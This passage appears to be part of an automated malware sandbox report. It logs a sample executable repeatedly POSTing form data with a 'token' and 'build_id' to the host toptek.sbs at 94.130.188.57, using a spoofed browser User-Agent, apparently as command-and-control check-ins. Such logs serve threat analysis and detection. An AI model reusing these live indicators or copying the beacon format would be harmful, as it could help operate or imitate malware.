                                                                                                                                                                                                                                                                                    2024-12-23 05:58:11 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 57 54 30 52 31 44 4a 57 42 53 4a 4d 37 59 55 4b 58 34 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 57 54 30 52 31 44 4a 57 42 53 4a 4d 37 59 55 4b 58 34 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 57 54 30 52 31 44 4a 57 42 53 4a 4d 37 59 55 4b 58 34 37 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------WT0R1DJWBSJM7YUKX47GContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------WT0R1DJWBSJM7YUKX47GContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------WT0R1DJWBSJM7YUKX47GCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:12 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    45192.168.2.54994894.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:14 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----16PP8GLX4OZU37YU3WL6
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:14 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 31 36 50 50 38 47 4c 58 34 4f 5a 55 33 37 59 55 33 57 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 31 36 50 50 38 47 4c 58 34 4f 5a 55 33 37 59 55 33 57 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 31 36 50 50 38 47 4c 58 34 4f 5a 55 33 37 59 55 33 57 4c 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------16PP8GLX4OZU37YU3WL6Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------16PP8GLX4OZU37YU3WL6Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------16PP8GLX4OZU37YU3WL6Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:15 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    46192.168.2.54995394.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:15 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----16PP8GLX4OZU37YU3WL6
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1837
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:15 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 31 36 50 50 38 47 4c 58 34 4f 5a 55 33 37 59 55 33 57 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 31 36 50 50 38 47 4c 58 34 4f 5a 55 33 37 59 55 33 57 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 31 36 50 50 38 47 4c 58 34 4f 5a 55 33 37 59 55 33 57 4c 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------16PP8GLX4OZU37YU3WL6Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------16PP8GLX4OZU37YU3WL6Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------16PP8GLX4OZU37YU3WL6Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:16 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    47192.168.2.54996294.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:17 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EK689ZM79H47YMGD2VA1
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1837
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:17 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 45 4b 36 38 39 5a 4d 37 39 48 34 37 59 4d 47 44 32 56 41 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 45 4b 36 38 39 5a 4d 37 39 48 34 37 59 4d 47 44 32 56 41 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 45 4b 36 38 39 5a 4d 37 39 48 34 37 59 4d 47 44 32 56 41 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------EK689ZM79H47YMGD2VA1Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------EK689ZM79H47YMGD2VA1Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------EK689ZM79H47YMGD2VA1Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:18 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    48192.168.2.54996794.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:18 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----9ZCBASRIWTRIMY5PHVAI
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:18 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 39 5a 43 42 41 53 52 49 57 54 52 49 4d 59 35 50 48 56 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 43 42 41 53 52 49 57 54 52 49 4d 59 35 50 48 56 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 43 42 41 53 52 49 57 54 52 49 4d 59 35 50 48 56 41 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------9ZCBASRIWTRIMY5PHVAIContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------9ZCBASRIWTRIMY5PHVAIContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------9ZCBASRIWTRIMY5PHVAICont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:19 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:19 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    49192.168.2.54997494.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:20 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----NYMYCB1VS0ZMYUSRQIW4
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:20 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 59 4d 59 43 42 31 56 53 30 5a 4d 59 55 53 52 51 49 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 4e 59 4d 59 43 42 31 56 53 30 5a 4d 59 55 53 52 51 49 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 4e 59 4d 59 43 42 31 56 53 30 5a 4d 59 55 53 52 51 49 57 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------NYMYCB1VS0ZMYUSRQIW4Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------NYMYCB1VS0ZMYUSRQIW4Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------NYMYCB1VS0ZMYUSRQIW4Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:21 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:21 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    50192.168.2.54997694.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:21 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----RIWBA168GLNYM79RQ9ZC
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:21 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 52 49 57 42 41 31 36 38 47 4c 4e 59 4d 37 39 52 51 39 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 52 49 57 42 41 31 36 38 47 4c 4e 59 4d 37 39 52 51 39 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 52 49 57 42 41 31 36 38 47 4c 4e 59 4d 37 39 52 51 39 5a 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------RIWBA168GLNYM79RQ9ZCContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------RIWBA168GLNYM79RQ9ZCContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------RIWBA168GLNYM79RQ9ZCCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:22 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:22 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    51192.168.2.54998394.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:23 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----NYMOHD2NOP8YMYU3ECBI
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:23 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 59 4d 4f 48 44 32 4e 4f 50 38 59 4d 59 55 33 45 43 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 4e 59 4d 4f 48 44 32 4e 4f 50 38 59 4d 59 55 33 45 43 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 4e 59 4d 4f 48 44 32 4e 4f 50 38 59 4d 59 55 33 45 43 42 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------NYMOHD2NOP8YMYU3ECBIContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------NYMOHD2NOP8YMYU3ECBIContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------NYMOHD2NOP8YMYU3ECBICont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:24 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    52192.168.2.54999094.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:24 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----XLFCJEUKXLNYM7G4E3W4
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:24 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 45 55 4b 58 4c 4e 59 4d 37 47 34 45 33 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 45 55 4b 58 4c 4e 59 4d 37 47 34 45 33 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 45 55 4b 58 4c 4e 59 4d 37 47 34 45 33 57 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------XLFCJEUKXLNYM7G4E3W4Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------XLFCJEUKXLNYM7G4E3W4Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------XLFCJEUKXLNYM7G4E3W4Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:25 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:25 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    53192.168.2.54999594.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:26 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----2DTJEUS2DTRQQIMOZMYM
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
